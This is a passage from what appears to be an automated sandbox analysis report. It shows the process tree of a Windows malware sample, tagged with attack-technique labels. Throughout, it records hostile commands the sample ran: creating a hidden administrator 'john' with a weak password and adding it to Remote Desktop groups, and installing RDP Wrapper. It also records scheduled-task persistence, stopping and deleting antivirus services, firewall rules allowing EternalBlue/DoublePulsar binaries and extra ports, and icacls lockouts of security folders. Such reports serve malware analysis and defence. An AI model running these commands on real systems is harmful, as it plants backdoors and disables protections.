        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        14⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        13⤵
        
        PID:3664
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        13⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        14⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        13⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        14⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        13⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        14⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        13⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        14⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        13⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        14⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        13⤵
        
        PID:3200
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        14⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        13⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:3736
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        14⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:3196
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        13⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        14⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        13⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        14⤵
        
        PID:3152
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        13⤵
        
        PID:3276
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        13⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        13⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        13⤵
        
        PID:828
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        14⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3108
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3868
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1316
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        11⤵
        Delays execution with timeout.exe
        
        PID:3828
        
        C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        8⤵
        
        PID:3948
        
        C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        9⤵
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D79.tmp\7D7A.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        10⤵
        
        PID:3364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3196
        
        C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        8⤵
        
        PID:3464
        
        C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        9⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        10⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        11⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
        10⤵
        Indicator Removal: Clear Persistence
        
        PID:3912
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
        11⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3488
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3400
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\programdata\microsoft\temp\H.bat
        8⤵
        
        PID:3268
      - C:\programdata\install\ink.exe
        
        C:\programdata\install\ink.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3932
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc start appidsvc
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3820
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        7⤵
        Launches sc.exe
        
        PID:4084
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc start appmgmt
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3824
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        7⤵
        Launches sc.exe
        
        PID:3252
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3168
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        7⤵
        Launches sc.exe
        
        PID:3336
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3348
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        7⤵
        Launches sc.exe
        
        PID:3372
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete swprv
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3204
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop mbamservice
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3240
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3272
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2856
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        7⤵
        Launches sc.exe
        
        PID:3308
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
        6⤵
        
        PID:3312
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3420
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete mbamservice
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3484
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete crmsvc
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3408
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3436
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete "windows node"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3580
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3660
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        7⤵
        Launches sc.exe
        
        PID:3672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop MoonTitle
        6⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3816
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2732
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:828
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop AudioServer
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop AudioServer
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3100
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete AudioServer"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3084
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AudioServer"
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3148
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3252
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3104
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3612
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3344
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3188
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3348
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3684
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3720
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3968
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3740
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3796
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        6⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        7⤵
        Modifies Windows Firewall
        
        PID:4056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        6⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        7⤵
        Modifies Windows Firewall
        
        PID:3456
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        6⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3588
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        6⤵
        
        PID:3672
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3784
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        6⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3724
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        6⤵
        
        PID:828
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        6⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3636
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        6⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3264
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        6⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3332
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        6⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3352
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        6⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        6⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3216
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        6⤵
        
        PID:2620
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        6⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3388
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        6⤵
        
        PID:4064
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        7⤵
        Modifies Windows Firewall
        
        PID:3528
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        6⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        7⤵
        Modifies Windows Firewall
        
        PID:2404
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        6⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        7⤵
        Modifies Windows Firewall
        
        PID:3856
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        6⤵
        
        PID:3608
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        7⤵
        Modifies Windows Firewall
        
        PID:3460
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        6⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3100
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3824
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        6⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:236
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3252
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3332
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        6⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3200
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        6⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:1312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4068
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:2620
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3732
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3932
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3468
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3436
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3560
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
        6⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        7⤵
        Modifies file permissions
        
        PID:3668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
        6⤵
        
        PID:568
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        7⤵
        Modifies file permissions
        
